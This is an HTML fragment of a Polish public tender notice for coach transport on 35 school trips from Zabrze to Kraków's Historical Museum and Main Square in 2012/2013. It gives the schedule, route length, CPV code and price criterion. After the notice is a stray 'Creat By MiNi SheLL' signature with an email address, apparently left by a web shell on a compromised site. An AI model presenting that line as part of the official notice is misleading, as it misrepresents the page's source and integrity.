<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> usługa transportowa związana z organizacją jednodniowej krajowej wycieczki edukacyjnej w roku szkolnym 2012/2013 na trasie Zabrze Plac Warszawski - Muzeum Historyczne Miasta Krakowa os. Słoneczne 16 Kraków - Rynek Główny w Krakowie - Zabrze Plac Warszawski - dla 35 grup 30 osobowych                                  ( maksymalnie 952 uczestników projektu + 64 opiekunów z ramienia szkoły ). Zamówienie obejmuję 35 wyjazdów autokarów co najmniej 33 osobowych z kierowcą wg harmonogramów dostarczonych przez Zamawiającego. W jednym dniu wycieczki wyjazd 1 autokaru tj. 30 uczestników projektu + 2 opiekunów + 1 kierowca.  
Planowany wyjazd 2 autokarów z Zabrza godz. 7:30.
W godzinach od 9:00 do 13:45 zwiedzanie Muzeum Historycznego Miasta Krakowa wraz z udziałem w lekcjach w Muzeum ( 4h ).  Zbiórka i przejazd autokarem na Rynek Główny w Krakowie ok. 14:00. Zwiedzanie Krakowa ( 3h) do godz. 17:00. Zbiórka przy autokarze godz. 17:15.  Wyjazd powrotny 1 autokaru do Zabrza ok. 17:30. Przyjazd do Zabrza godz. ok. 19:00.
Szacunkowa długość trasy 1 autokaru w obie strony: 207,6 km + 20,8 km ( długość trasy w obie strony na trasie Muzeum Historyczne Miasta Krakowa -Rynek Główny w Krakowie )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.17.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com